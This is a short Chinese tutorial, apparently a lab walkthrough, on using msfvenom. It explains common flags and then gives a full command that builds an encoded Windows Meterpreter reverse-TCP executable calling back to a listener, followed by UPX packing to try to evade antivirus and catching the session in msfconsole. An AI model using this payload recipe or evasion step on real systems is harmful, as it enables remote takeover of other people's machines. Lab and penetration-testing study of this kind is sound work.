- 工具:msfvenom
1.1 msfvenom的简介
msfvenom是kali linux下一个可以产生自定义payload的程序,是净荷生成和编码的组合。msfvenom主要使用msf作为框架,可以多平台互通,并为我们使用和练习提供了非常的帮助。有关msfvenom的参数,在这里我只说几个比较常用的参数,其他的请百度。
1.2msfvenom的常用参数:
-p :< payload >
指定一个有效的自定义载荷
-l :< list >
列出一个模块类型,选项有:有效载荷,编码器,NOP,所有
-f:< format >
输出格式
-a:< arch >
使用的架构
-i:< iterations >
有效载荷的次数
-e:< encoder >
所使用的编码方式
2.实例
在终端输入以下命令
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b "\x00" lhost=10.5.69.128 lport=4444 -f exe > test.exe
可以看到,在主文件下已经生成了test.exe文件
将该文件拖拽到测试机中使用杀毒软件扫描
扫描结果:
用upx命令对文件压缩加壳
再次用杀毒软件测试是否免杀,没通过,没事我们把该文件复制到虚拟机win7中继续我们的工作(哈哈,这里不是为了打广告,而是这个木马确实很简陋很简陋,再说杀毒软件也不是摆设对不对)
复制到虚拟机中的win7之后双击运行,打开linux终端,输入msfconsole,开始监听,
按下图所示输入命令,设置监听选项,
依次输入下列命令,回车,已经开始监听
然后在测试机双击运行test,可以看到在主机上看到了会话